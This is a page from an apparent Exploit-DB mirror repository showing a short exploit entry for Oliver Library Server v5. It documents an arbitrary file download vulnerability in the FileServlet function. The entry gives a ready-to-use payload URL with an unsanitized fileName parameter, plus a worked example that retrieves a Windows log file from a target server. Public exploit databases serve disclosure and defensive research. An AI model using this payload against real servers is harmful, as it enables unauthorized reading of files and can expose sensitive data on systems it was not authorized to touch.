bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/50599.txt
Offensive Security 3d06837f80 DB: 2021-12-16 
2 changes to exploits/shellcodes

Oliver Library Server v5 - Arbitrary File Download
2021-12-16 05:01:55 +00:00

18 lines
No EOL
822 B
Text
Raw Permalink Blame History

# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
Reference in a new issue View git blame Copy permalink